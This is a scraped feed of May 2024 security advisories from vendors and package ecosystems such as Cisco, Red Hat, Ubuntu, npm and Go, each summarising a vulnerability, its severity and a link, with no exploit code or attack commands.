15.05.2024 19:00:00cisco[CISCO-SA-ESA-HTTP-SPLIT-GLRNNOWS] Cisco Secure Email Gateway HTTP Response Splitting Vulnerability (medium)A vulnerability in the web-based management API of Cisco AsyncOS Software for Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to conduct an HTTP response splitting attack.This vulnerability is due to insufficient input validation of some parameters that are passed to the web-based management API of the affected system. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to perform cross-site scripting (XSS) attacks, resulting in the execution of arbitrary script code in the browser of the targeted user, or could allow the attacker to access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-HTTP-SPLIT-GLRNNOWS
15.05.2024 19:00:00cisco[CISCO-SA-APPD-NETVISDOS-9ZNBSJTK] Cisco AppDynamics Network Visibility Service Denial of Service Vulnerability (medium)A vulnerability in Cisco AppDynamics Network Visibility Agent could allow an unauthenticated, local attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to the inability to handle unexpected input. An attacker who has local device access could exploit this vulnerability by sending an HTTP request to the targeted service. A successful exploit could allow the attacker to cause a DoS condition by stopping the Network Agent Service on the local device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APPD-NETVISDOS-9ZNBSJTK
15.05.2024 18:15:08ubuntu[USN-6766-2] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6766-2
16.05.2024 10:51:11almalinux[ALSA-2024:2843] .NET 7.0 security update (important).NET 7.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2843
16.05.2024 10:49:52almalinux[ALSA-2024:2853] nodejs:20 security update (important)nodejs:20 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2853
16.05.2024 10:52:43almalinux[ALSA-2024:2842] .NET 8.0 security update (important).NET 8.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2842
21.05.2024 00:03:14npm[NPM:GHSA-5F97-H2C2-826Q] json-schema-ref-parser Prototype Pollution issue (high)A Prototype Pollution issue in API Dev Tools json-schema-ref-parser v.11.0.0 and v.11.1.0 allows a remote attacker to execute arbitrary code via the `bundle()`, `parse()`, `resolve()`, `dereference()` functions.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5F97-H2C2-826Q
20.05.2024 23:56:15npm[NPM:GHSA-8VR4-H4RR-8PH6] MiguelCastillo @bit/loader Prototype Pollution issue (moderate)A Prototype Pollution issue in MiguelCastillo @bit/loader v.10.0.3 allows an attacker to execute arbitrary code via the M function e argument in index.js.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8VR4-H4RR-8PH6
20.05.2024 23:54:11npm[NPM:GHSA-G3Q2-VCJQ-RGRC] Blackprint @blackprint/engine Prototype Pollution issue (moderate)A Prototype Pollution issue in Blackprint @blackprint/engine 0.8.12 through 0.9.1 allows an attacker to execute arbitrary code via the `_utils.setDeepProperty` function of `engine.min.js`.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G3Q2-VCJQ-RGRC
20.05.2024 17:57:08maven[MAVEN:GHSA-QXQF-2MFX-X8JW] veraPDF has potential XSLT injection vulnerability when using policy files (high)### Impact Executing policy checks using custom schematron files invokes an XSL transformation that may theoretically lead to a remote code execution (RCE) vulnerability. ### Patches This has been patched and users should upgrade to veraPDF v1.24.2 ### Workarounds This doesn't affect the standard validation and policy checks functionality, veraPDF's common use cases. Most veraPDF users don't insert any custom XSLT code into policy profiles, which are based on Schematron syntax rather than direct XSL transforms. For users who do, only load custom policy files from sources you trust. ### References Original issue: <https://github.com/veraPDF/veraPDF-library/issues/1415> https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QXQF-2MFX-X8JW
20.05.2024 10:23:15almalinux[ALSA-2024:2910] nodejs security update (important)nodejs security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2910
20.05.2024 03:00:00cisa[CISA-2024:0520] CISA Adds 2 Known Exploited Vulnerabilities to CatalogCISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0520
20.05.2024 03:00:00oraclelinux[ELSA-2024-2913] thunderbird security update (important)[115.11.0-1.0.1] - Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js - Enabled aarch64 build [115.11.0-1] - Update to 115.11.0 build2 https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2913
20.05.2024 03:00:00redhat[RHSA-2024:2913] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 115.11.0. Security Fix(es): * firefox: Arbitrary JavaScript execution in PDF.js (CVE-2024-4367) * firefox: IndexedDB files retained in private browsing mode (CVE-2024-4767) * firefox: Potential permissions request bypass via clickjacking (CVE-2024-4768) * firefox: Cross-origin responses could be distinguished between script and non-script content-types (CVE-2024-4769) * firefox: Use-after-free could occur when printing to PDF (CVE-2024-4770) * firefox: Memory safety bugs fixed in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11 (CVE-2024-4777) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2913
20.05.2024 03:00:00redhat[RHSA-2024:2910] nodejs security update (important)Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es): * nodejs: CONTINUATION frames DoS (CVE-2024-27983) * nodejs: using the fetch() function to retrieve content from an untrusted URL leads to denial of service (CVE-2024-22025) * nodejs: HTTP Request Smuggling via Content Length Obfuscation (CVE-2024-27982) * nghttp2: CONTINUATION frames DoS (CVE-2024-28182) * c-ares: Out of bounds read in ares__read_line() (CVE-2024-25629) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2910
17.05.2024 23:06:00go[GO-2024-2748] Privilege Escalation in Kubernetes in k8s.io/apimachineryThe Kubernetes kube-apiserver is vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise. https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2748
17.05.2024 22:48:16go[GO-2024-2632] JWX vulnerable to a denial of service attack using compressed JWE message in github.com/lestrrat-go/jwxAn attacker with a trusted public key may cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the recipient, it results in significant memory allocation and processing time during decompression. https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2632
17.05.2024 22:37:01go[GO-2024-2574] Insecure CORS Configuration allowing wildcard origin with credentials in github.com/gofiber/fiber/v2The CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard ("*") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices. https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2574
17.05.2024 22:28:30go[GO-2024-2694] Potential Reentrancy using Timeout Callbacks in ibc-hooks in github.com/cosmos/ibc-go https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2694
17.05.2024 22:04:39go[GO-2024-2702] Code injection vulnerability in github.com/flipped-aurora/gin-vue-admin/serverGin-vue-admin has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter. https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2702
17.05.2024 21:57:37go[GO-2024-2842] Unexpected authenticated registry accesses in github.com/containers/image/v5An attacker may trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks. https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2842
17.05.2024 20:15:07alpinelinux[ALPINE:CVE-2024-35190] asterisk vulnerability[From CVE-2024-35190] Asterisk is an open source private branch exchange and telephony toolkit. After upgrade to 18.23.0, ALL unauthorized SIP requests are identified as PJSIP Endpoint of local asterisk server. This vulnerability is fixed in 18.23.1, 20.8.1, and 21.3.1.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-35190
17.05.2024 03:00:00debian[DSA-5693-1] thunderbird security update https://secdb.nttzen.cloud/security-advisory/debian/DSA-5693-1
17.05.2024 03:00:00debian[DSA-5694-1] chromium security update https://secdb.nttzen.cloud/security-advisory/debian/DSA-5694-1
21.05.2024 10:56:50almalinux[ALSA-2024:2883] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2883
21.05.2024 10:54:53almalinux[ALSA-2024:2888] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2888
17.05.2024 03:00:00freebsd[FREEBSD:B88AA380-1442-11EF-A490-84A93843EB75] OpenSSL -- Denial of Service vulnerabilityThe OpenSSL project reports: Excessive time spent checking DSA keys and parameters (Low) Checking excessively long DSA keys or parameters may be very slow.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B88AA380-1442-11EF-A490-84A93843EB75
17.05.2024 03:00:00freebsd[FREEBSD:A431676C-F86C-4371-B48A-B7D2B0BEC3A3] electron29 -- setuid() does not affect libuv's internal io_uringElectron developers report: This update fixes the following vulnerability: Backported fix for CVE-2024-22017.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:A431676C-F86C-4371-B48A-B7D2B0BEC3A3
18.05.2024 03:00:00freebsd[FREEBSD:F393B5A7-1535-11EF-8064-C5610A6EFFFB] Arti -- Security issues related to circuit constructionTor Project reports: When building anonymizing circuits to or from an onion service with 'lite' vanguards (the default) enabled, the circuit manager code would build the circuits with one hop too few. When 'full' vanguards are enabled, some circuits are supposed to be built with an extra hop to minimize the linkability of the guard nodes. In some circumstances, the circuit manager would build circuits with one hop too few, making it easier for an adversary to discover the L2 and L3 guards of the affected clients and services.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:F393B5A7-1535-11EF-8064-C5610A6EFFFB
22.05.2024 01:39:36ubuntu[USN-6775-2] Linux kernel vulnerabilities (medium)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6775-2
22.05.2024 01:34:49ubuntu[USN-6777-3] Linux kernel (GCP) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6777-3
21.05.2024 21:09:58npm[NPM:GHSA-PJ27-2XVP-4QXG] @fastify/session reuses destroyed session cookie (high)### Impact When restoring the cookie from the session store, the `expires` field is overridden if the `maxAge` field was set. This means a cookie is never correctly detected as expired and thus expired sessions are not destroyed. ### Patches Updating to v10.9.0 will solve this. ### Workarounds None ### References Publicly reported at: https://github.com/fastify/session/issues/251 https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PJ27-2XVP-4QXG
21.05.2024 16:56:05ubuntu[USN-6780-1] idna vulnerabilityidna could be made to consume significant resources if it receives a specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6780-1
21.05.2024 16:21:26ubuntu[USN-6781-1] Spreadsheet::ParseExcel vulnerability (high)Spreadsheet::ParseExcel could possibly run commands if it processed a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6781-1
22.05.2024 22:15:13go[GO-2024-2571] Vesting account creation on blocked address in cosmossdk.io/x/authhttps://secdb.nttzen.cloud/security-advisory/go/GO-2024-2571
22.05.2024 22:33:26maven[MAVEN:GHSA-9RRW-82R2-623P] Silverpeas Core vulnerable to Cross Site Scripting (moderate)Silverpeas Core 6.3 is vulnerable to Cross Site Scripting (XSS) via ClipboardSessionController.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9RRW-82R2-623P
22.05.2024 22:42:50npm[NPM:GHSA-XGWH-CGV9-783V] Ghost allows CSV Injection during member CSV export (high)Ghost before 5.82.0 allows CSV Injection during a member CSV export.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGWH-CGV9-783V
22.05.2024 19:00:00cisco[CISCO-SA-FMC-SQLI-WFFDNNOS] Cisco Firepower Management Center Software SQL Injection Vulnerability (high)A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.This vulnerability exists because the web-based management interface does not adequately validate user input. An attacker could exploit this vulnerability by authenticating to the application and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to obtain any data from the database, execute arbitrary commands on the underlying operating system, and elevate privileges to root. To exploit this vulnerability, an attacker would need at least Read Only user credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-SQLI-WFFDNNOS
22.05.2024 19:00:00cisco[CISCO-SA-SNORT3-IPS-BYPASS-UE69KBMD] Multiple Cisco Products Snort 3 HTTP Intrusion Prevention System Rule Bypass Vulnerability (medium)Multiple Cisco products are affected by a vulnerability in the Snort Intrusion Prevention System (IPS) rule engine that could allow an unauthenticated, remote attacker to bypass the configured rules on an affected system.This vulnerability is due to incorrect HTTP packet handling. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass configured IPS rules and allow uninspected traffic onto the network.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNORT3-IPS-BYPASS-UE69KBMD
22.05.2024 19:00:00cisco[CISCO-SA-FTD-ARCHIVE-BYPASS-Z4WQJWCN] Cisco Firepower Threat Defense Software Encrypted Archive File Policy Bypass Vulnerability (medium)A vulnerability in the file policy feature that is used to inspect encrypted archive files of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured file policy to block an encrypted archive file.This vulnerability exists because of a logic error when a specific class of encrypted archive files is inspected. An attacker could exploit this vulnerability by sending a crafted, encrypted archive file through the affected device. A successful exploit could allow the attacker to send an encrypted archive file, which could contain malware and should have been blocked and dropped at the Cisco FTD device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-ARCHIVE-BYPASS-Z4WQJWCN
22.05.2024 19:00:00cisco[CISCO-SA-FMC-OBJECT-BYPASS-FTH8TDJQ] Cisco Firepower Management Center Software Object Group Access Control List Bypass Vulnerability (medium)A vulnerability in the Object Groups for Access Control Lists (ACLs) feature of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass configured access controls on managed devices that are running Cisco Firepower Threat Defense (FTD) Software.This vulnerability is due to the incorrect deployment of the Object Groups for ACLs feature from Cisco FMC Software to managed FTD devices in high-availability setups. After an affected device is rebooted following Object Groups for ACLs deployment, an attacker can exploit this vulnerability by sending traffic through the affected device. A successful exploit could allow the attacker to bypass configured access controls and successfully send traffic to devices that are expected to be protected by the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-OBJECT-BYPASS-FTH8TDJQ
22.05.2024 19:00:00cisco[CISCO-SA-ASAFTD-SAML-BYPASS-KKNVXYKW] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Authorization Bypass Vulnerability (medium)A vulnerability in the implementation of SAML 2.0 single sign-on (SSO) for remote access VPN services in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to successfully establish a VPN session on an affected device.This vulnerability is due to improper separation of authorization domains when using SAML authentication. An attacker could exploit this vulnerability by using valid credentials to successfully authenticate using their designated connection profile (tunnel group), intercepting the SAML SSO token that is sent back from the Cisco ASA device, and then submitting the same SAML SSO token to a different tunnel group for authentication. A successful exploit could allow the attacker to establish a remote access VPN session using a connection profile that they are not authorized to use and connect to secured networks behind the affected device that they are not authorized to access. For successful exploitation, the attacker must have valid remote access VPN user credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-SAML-BYPASS-KKNVXYKW
22.05.2024 19:00:00 | cisco | [CISCO-SA-ASAFTD-OGSNSG-ACLBYP-3XB8Q6JX] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Inactive-to-Active ACL Bypass Vulnerability (medium) | A vulnerability in the activation of an access control list (ACL) on Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass the protection that is offered by a configured ACL on an affected device. This vulnerability is due to a logic error that occurs when an ACL changes from inactive to active in the running configuration of an affected device. An attacker could exploit this vulnerability by sending traffic through the affected device that should be denied by the configured ACL. The reverse condition is also true: traffic that should be permitted could be denied by the configured ACL. A successful exploit could allow the attacker to bypass configured ACL protections on the affected device, allowing the attacker to access trusted networks that the device might be protecting. Note: This vulnerability applies to both IPv4 and IPv6 traffic as well as dual-stack ACL configurations in which both IPv4 and IPv6 ACLs are configured on an interface. Cisco has released software updates that address this vulnerability. There is a workaround that addresses this vulnerability. This advisory is part of the May 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75298"]. | https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-OGSNSG-ACLBYP-3XB8Q6JX
22.05.2024 18:02:15 | go | [GO-2024-2870] Credential leakage in github.com/aquasecurity/trivy (medium) | A malicious registry can cause Trivy to leak credentials for legitimate registries such as AWS Elastic Container Registry (ECR), Google Cloud Artifact/Container Registry, or Azure Container Registry (ACR) if the registry is scanned directly using Trivy. These tokens can then be used to push/pull images from those registries to which the identity/user running Trivy has access. This vulnerability only applies when scanning container images directly from a registry. If you use Docker, containerd or another runtime to pull images locally and scan them with Trivy, you are not affected. To enforce this behavior, you can use the --image-src flag to select which sources you trust. | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2870
22.05.2024 08:06:43 | ubuntu | [USN-6782-1] Thunderbird vulnerabilities | Several security issues were fixed in Thunderbird. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6782-1
22.05.2024 03:00:00 | debian | [DSA-5695-1] webkit2gtk | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5695-1
22.05.2024 03:00:00 | debian | [DSA-5696-1] chromium | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5696-1
22.05.2024 03:00:00 | redhat | [RHSA-2024:2950] kernel-rt security and bug fix update (moderate) | The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2950
22.05.2024 03:00:00 | redhat | [RHSA-2024:2966] ghostscript security update (low) | The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed. Security Fix(es): * ghostscript: Divide by zero in eps_print_page in gdevepsn.c (CVE-2020-21710). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2966
22.05.2024 03:00:00 | redhat | [RHSA-2024:2974] libXpm security update (moderate) | X.Org X11 libXpm runtime library. Security Fix(es): * libXpm: out of bounds read in XpmCreateXpmImageFromBuffer() (CVE-2023-43788) * libXpm: out of bounds read on XPM with corrupted colormap (CVE-2023-43789). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2974
22.05.2024 03:00:00 | redhat | [RHSA-2024:2979] poppler security update (moderate) | Poppler is a Portable Document Format (PDF) rendering library, used by applications such as Evince. Security Fix(es): * poppler: NULL pointer dereference in `FoFiType1C::convertToType1` (CVE-2020-36024). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2979
22.05.2024 03:00:00 | redhat | [RHSA-2024:2980] harfbuzz security update (moderate) | HarfBuzz is an implementation of the OpenType Layout engine. Security Fix(es): * harfbuzz: allows attackers to trigger O(n^2) growth via consecutive marks (CVE-2023-25193). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2980
22.05.2024 03:00:00 | redhat | [RHSA-2024:2986] python3.11-urllib3 security update (moderate) | The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities. Security Fix(es): * python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2986
22.05.2024 03:00:00 | redhat | [RHSA-2024:2994] LibRaw security update (moderate) | LibRaw is a library for reading RAW files obtained from digital photo cameras (CRW/CR2, NEF, RAF, DNG, and others). Security Fix(es): * LibRaw: stack buffer overflow in LibRaw_buffer_datastream::gets() in src/libraw_datastream.cpp (CVE-2021-32142). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2994
22.05.2024 03:00:00 | redhat | [RHSA-2024:3030] libsndfile security update (moderate) | libsndfile is a C library for reading and writing files containing sampled sound, such as AIFF, AU, or WAV. Security Fix(es): * libsndfile: integer overflow in src/mat4.c and src/au.c leads to DoS (CVE-2022-33065). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3030
22.05.2024 03:00:00 | redhat | [RHSA-2024:3043] ansible-core bug fix, enhancement, and security update (moderate) | Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. Security Fix(es): * ansible-core: possible information leak in tasks that ignore ANSIBLE_NO_LOG configuration (CVE-2024-0690). Bug Fix(es): * Update ansible-core to 2.16.3 (JIRA:RHEL-23782) * Rebuild ansible-core with python 3.12 (JIRA:RHEL-24141). | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3043
22.05.2024 03:00:00 | redhat | [RHSA-2024:3044] idm:DL1 security update (moderate) | Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es): * freeipa: specially crafted HTTP requests potentially lead to denial of service (CVE-2024-1481). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3044
22.05.2024 03:00:00 | redhat | [RHSA-2024:3049] perl-Convert-ASN1 security update (moderate) | Convert::ASN1 encodes and decodes ASN.1 data structures using BER/DER rules. Security Fix(es): * perl-Convert-ASN1: allows remote attackers to cause an infinite loop via unexpected input (CVE-2013-7488). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3049
22.05.2024 03:00:00 | redhat | [RHSA-2024:3056] qt5-qtbase security update (moderate) | Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt. Security Fix(es): * qt: incorrect integer overflow check (CVE-2023-51714) * qtbase: potential buffer overflow when reading KTX images (CVE-2024-25580). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3056
22.05.2024 03:00:00 | redhat | [RHSA-2024:3059] libtiff security update (moderate) | The libtiff packages contain a library of functions for manipulating Tagged Image File Format (TIFF) files. Security Fix(es): * libtiff: out-of-bounds read in tiffcp in tools/tiffcp.c (CVE-2022-4645). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3059
22.05.2024 03:00:00 | redhat | [RHSA-2024:2952] resource-agents security and bug fix update (moderate) | The resource-agents packages provide the Pacemaker and RGManager service managers with a set of scripts. These scripts interface with several services to allow operating in a high-availability (HA) environment. Security Fix(es): * urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803) * pycryptodome: side-channel leakage for OAEP decryption in PyCryptodome and pycryptodomex (CVE-2023-52323). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2952
22.05.2024 03:00:00 | redhat | [RHSA-2024:2953] pcs security update (moderate) | The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Security Fix(es): * rubygem-rack: Denial of Service Vulnerability in Rack Content-Type Parsing (CVE-2024-25126) * rubygem-rack: Possible DoS Vulnerability with Range Header in Rack (CVE-2024-26141) * rubygem-rack: Possible Denial of Service Vulnerability in Rack Header Parsing (CVE-2024-26146). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2953
